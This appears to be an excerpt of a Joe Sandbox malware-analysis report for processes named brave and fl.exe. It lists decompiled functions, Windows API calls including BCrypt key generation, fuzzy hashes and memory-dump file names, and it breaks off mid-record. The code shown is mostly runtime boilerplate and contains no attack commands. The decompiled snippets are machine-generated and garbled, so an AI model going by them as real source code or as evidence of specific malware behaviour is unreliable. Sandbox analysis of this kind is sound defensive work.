Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction ID: 3e5be32d2001b3a79fbcb556574f057fb8609c361c0ddf13943c96ed48802f84
Opcode Fuzzy Hash: f843c02a3ac8a37aa77967842025417caac5300183c0b72a0349012f07414de9
Instruction Fuzzy Hash: 61F06252D18F8482D3028F1CA8401EB7375FF4E78DF185325EE8D76565DF69E5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E5F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2E5F0() {

				goto 0x52b2e56f;
				goto 0x52b2e56f;
				0;
				return 0;
			}

0x7ff652b2e617
0x7ff652b2e623
0x7ff652b2e62e
0x7ff652b2e632

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

Overflow range error (OVERFLOW), xrefs: 00007FF652B2E5F0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction ID: 49f984740f231c83a910ceff16c6f3c225c6db24fe1650cd63deaaa79fea9004
Opcode Fuzzy Hash: 3e9574b252411c4c4ea22a5fc3152e866e1922d8c7747fb6b8066ac752191a04
Instruction Fuzzy Hash: 0AF06252D18E8482D3029F1CA8401EB7375FF4E78DF285326EE8D76565DF69E5428700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2E568 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF652B2E5B0

Strings

Argument singularity (SIGN), xrefs: 00007FF652B2E568
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF652B2E597

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction ID: bfaae5670020d7cae6ecfdbea866730036100a916f4c4d1fa3db217ba972387f
Opcode Fuzzy Hash: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction Fuzzy Hash: CEF06D62918F8882D3028F2CA8401ABB365FF4E78DF195326EE8C3A124DF68D5428B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2EFE0 Relevance: 5.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B2EFE0(void* __eax, void* __edx, void* __rcx) {

				if (__edx == 1) goto 0x52b2f008;
				if (__edx == 3) goto 0x52b2f0a8;
				if (__edx == 0) goto 0x52b2f030;
				return __eax;
			}

0x7ff652b2efec
0x7ff652b2eff1
0x7ff652b2eff9
0x7ff652b2f001

APIs

free.MSVCRT ref: 00007FF652B2F05D
free.MSVCRT ref: 00007FF652B2F0CD

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ccc944b36c3ae1429ee3a79869be49935982731d5f2a199b4789e67ba8bb8f3a
Instruction ID: 2fea9249733a88934e5ed21a65c98868aab23d3b254c0c15012917a2476a0876
Opcode Fuzzy Hash: ccc944b36c3ae1429ee3a79869be49935982731d5f2a199b4789e67ba8bb8f3a
Instruction Fuzzy Hash: B5413C66E09A4781FB159F11EC503B973A0BF65B8CF8C4635CA4DA62A1DFBCE885C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39550 Relevance: 5.1, APIs: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B39550(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x52b395f0;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x52b395f0;
				if (_t6 == 0xffffffff) goto 0x52b39660;
				if ( *_t6 == 0xc0bab1fd) goto 0x52b39590;
				return 0x16;
			}

0x7ff652b3955c
0x7ff652b39562
0x7ff652b39568
0x7ff652b39572
0x7ff652b39583
0x7ff652b3958e

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF652B39597
LeaveCriticalSection.KERNEL32 ref: 00007FF652B395C1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction ID: 74729b138cee2d90baeb99585707c5295f1f8c38a844cec2fd522b5725facc76
Opcode Fuzzy Hash: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction Fuzzy Hash: 39318073A08A428BE744CF35988466A33A0FB51B6CF4C4236CD2ADA384DFB8D885C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39880 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00007FF67FF652B39880(intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t19;
				void* _t27;
				intOrPtr* _t28;

				_t19 =  *__rcx;
				_t28 = __rcx;
				EnterCriticalSection(??);
				_t14 =  *((intOrPtr*)(_t19 + 0xc));
				if (_t14 == 0) goto 0x52b39900;
				 *((intOrPtr*)(_t19 + 0xc)) = _t27 - 1;
				LeaveCriticalSection(??);
				if (_t14 != 1) goto 0x52b398da;
				if (E00007FF67FF652B38880(1,  *((intOrPtr*)(_t19 + 0xa8)), _t19 + 0x70, _t19 + 0x98) != 0) goto 0x52b398e7;
				_t12 = E00007FF67FF652B304E0( *((intOrPtr*)(_t28 + 8)));
				if (_t12 == 0) goto 0x52b398ed;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x10)))) = _t12;
				return _t12;
			}

0x7ff652b3988c
0x7ff652b39893
0x7ff652b39899
0x7ff652b3989f
0x7ff652b398a4
0x7ff652b398ac
0x7ff652b398af
0x7ff652b398b8
0x7ff652b398d8
0x7ff652b398de
0x7ff652b398e5
0x7ff652b398eb
0x7ff652b398f9

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF652B39899
LeaveCriticalSection.KERNEL32 ref: 00007FF652B398AF

Part of subcall function 00007FF652B38880: EnterCriticalSection.KERNEL32 ref: 00007FF652B38898
Part of subcall function 00007FF652B38880: ReleaseSemaphore.KERNEL32 ref: 00007FF652B388C6
Part of subcall function 00007FF652B38880: LeaveCriticalSection.KERNEL32 ref: 00007FF652B388D3

LeaveCriticalSection.KERNEL32 ref: 00007FF652B39913

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
String ID:
API String ID: 3630377130-0
Opcode ID: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction ID: b853cb2a10ab6b8aa73091abb07a95b5981466421649b37d54e79af2143a358a
Opcode Fuzzy Hash: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction Fuzzy Hash: 4D313832A04A0297E7549F3AD8546A933A0FB96BACF5C4231DE1DD7385DFB8E485C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39410 Relevance: 5.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B39410(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x52b394a8;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x52b394a8;
				if (_t6 == 0xffffffff) goto 0x52b39510;
				if ( *_t6 == 0xc0bab1fd) goto 0x52b39450;
				return 0x16;
			}

0x7ff652b3941a
0x7ff652b39420
0x7ff652b39426
0x7ff652b39430
0x7ff652b39441
0x7ff652b3944a

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF652B39457
LeaveCriticalSection.KERNEL32 ref: 00007FF652B3947E

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction ID: a04e0f4bb96ce13f392321ecc483266c1c0e613a0f1c814a283016ec3a2fab6d
Opcode Fuzzy Hash: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction Fuzzy Hash: E5317073A08A068BEB54CF35DC5426973A0FB55B6CF5C8235CD299A388DE78D484C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B39120 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF652B39749), ref: 00007FF652B39146
LeaveCriticalSection.KERNEL32(?,00007FF652B39749,?,?,?,?,?,?,?,?,?,?,?,00007FF652DE1400,?), ref: 00007FF652B3916B
EnterCriticalSection.KERNEL32(?,00007FF652B39749,?,?,?,?,?,?,?,?,?,?,?,00007FF652DE1400,?), ref: 00007FF652B3919C
LeaveCriticalSection.KERNEL32(?,00007FF652B39749,?,?,?,?,?,?,?,?,?,?,?,00007FF652DE1400,?), ref: 00007FF652B391A6

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction ID: 74e16f881f876fb60f673101120761398010fbc53e59830b2b5218ee4a9f72f8
Opcode Fuzzy Hash: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction Fuzzy Hash: 06012626B08E56AAE615DB33BC44A2B6750BF99FEDF891031DE0D67350CD7DE4828340

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: fl.exePID: 1776, Parent PID: 5440COMMON

Executed Functions

Function 002B1170 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 002B1443

Strings

`7lv, xrefs: 002B1443

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: InfoStartup
String ID: `7lv
API String ID: 2571198056-1265118120
Opcode ID: 3cac092c3f5063261848f5b3967df775b851d4fa7f945a0ff0925a8791b8171b
Instruction ID: 56ab9d4337a58cd88af52961d0cc6908dd4d063971439d38739dc744a7793285
Opcode Fuzzy Hash: 3cac092c3f5063261848f5b3967df775b851d4fa7f945a0ff0925a8791b8171b
Instruction Fuzzy Hash: 68519CB0924301CFD710EFA8D89469EBBF0BB56384F50892DE9448B351E774A9A8DF42

Uniqueness

Uniqueness Score: -1.00%

Function 002C0B8E Relevance: 16.7, APIs: 8, Strings: 1, Instructions: 907COMMON

Download Yara Rule

APIs

_wgetenv_s.MSVCRT(-00000004,00000001), ref: 002C0E14

Strings

, xrefs: 002C177E

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: _wgetenv_s
String ID:
API String ID: 2185007978-3916222277
Opcode ID: b0d1a9e26dd0c619da555602d5439e9f597b1b7a7a641461a8eb61a703e03e59
Instruction ID: ed9105ad6f2e48299652720cc1f5bdb937556aa9c3d04f3ffa7a36364746b92d
Opcode Fuzzy Hash: b0d1a9e26dd0c619da555602d5439e9f597b1b7a7a641461a8eb61a703e03e59
Instruction Fuzzy Hash: DD8290F08146188BDB24EF14DC95BE9B7F8EF45304F1045DEE64AA3282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002B11B3 Relevance: 15.1, APIs: 10, Instructions: 143stringCOMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 002B1248
__p__acmdln.MSVCRT ref: 002B1271
malloc.MSVCRT ref: 002B12FB
strlen.MSVCRT ref: 002B132B
malloc.MSVCRT ref: 002B1336
memcpy.MSVCRT ref: 002B134C
_amsg_exit.MSVCRT ref: 002B13F2
_initterm.MSVCRT ref: 002B1414
_initterm.MSVCRT ref: 002B1489

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterUnhandled__p__acmdln_amsg_exitmemcpystrlen
String ID:
API String ID: 760028103-0
Opcode ID: e2b5563e9f8b3aff3bdd0af7206f409e284ba29759fc00429bd9faaffa58da78
Instruction ID: f7aa037493e9820cefe90c59866573b26ab185371ee27fe65f62896bc7c95982
Opcode Fuzzy Hash: e2b5563e9f8b3aff3bdd0af7206f409e284ba29759fc00429bd9faaffa58da78
Instruction Fuzzy Hash: FA518FB0A14305CFDB10EF65D89539DBBF0FB15384F54892DE98487350E774A9A8DB41

Uniqueness

Uniqueness Score: -1.00%

Function 002C121E Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 313COMMON

Download Yara Rule

Strings

, xrefs: 002C177E
jz6, xrefs: 002C1220

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID:
String ID: $jz6
API String ID: 0-4123409508
Opcode ID: ddfa9c3fc41a87a05fddab9a0fd13c56f0e4c344cd476dc3a81819fe31905aaa
Instruction ID: 3abc18581b8b18359756939806b508f8333c5e1ec8d20b3b6a937a594df51514
Opcode Fuzzy Hash: ddfa9c3fc41a87a05fddab9a0fd13c56f0e4c344cd476dc3a81819fe31905aaa
Instruction Fuzzy Hash: 53D15FB08142288BDB24EF14DC95BEDB7F4EF46304F1045DEE649A7282EB785A94CF19

Uniqueness

Uniqueness Score: -1.00%

Function 002C15DA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188stringCOMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT(00000000,?,?,?,00000000,00000000,00000000,00000000,?,?), ref: 002C1735
BCryptSetProperty.BCRYPT(?,?,?,?,?,?,00000000,?), ref: 002C1799
strlen.MSVCRT ref: 002C17B2
BCryptGenerateSymmetricKey.BCRYPT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 002C1823

Strings

, xrefs: 002C177E
., xrefs: 002C1638

Memory Dump Source

Source File: 0000002B.00000002.428181510.00000000002B1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002B0000, based on PE: true

Associated: 0000002B.00000002.428154505.00000000002B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435012621.00000000004EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435169570.00000000004EF000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435508812.000000000050C000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435531937.000000000050E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435602607.000000000050F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435646580.0000000000512000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000002B.00000002.435669617.0000000000513000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_2b0000_fl.jbxd

Similarity

API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetricstrlen
String ID: $.
API String ID: 1792048238-3929174939
Opcode ID: e638216f5da6862b7fb90faf5b13e0d95411426a69cb368fc647ca0567cfcd08
Instruction ID: a0c12fea70998ba0d1b33d5b336ac584f7194c5440d8e958a0b615a49650654e
Opcode Fuzzy Hash: e638216f5da6862b7fb90faf5b13e0d95411426a69cb368fc647ca0567cfcd08
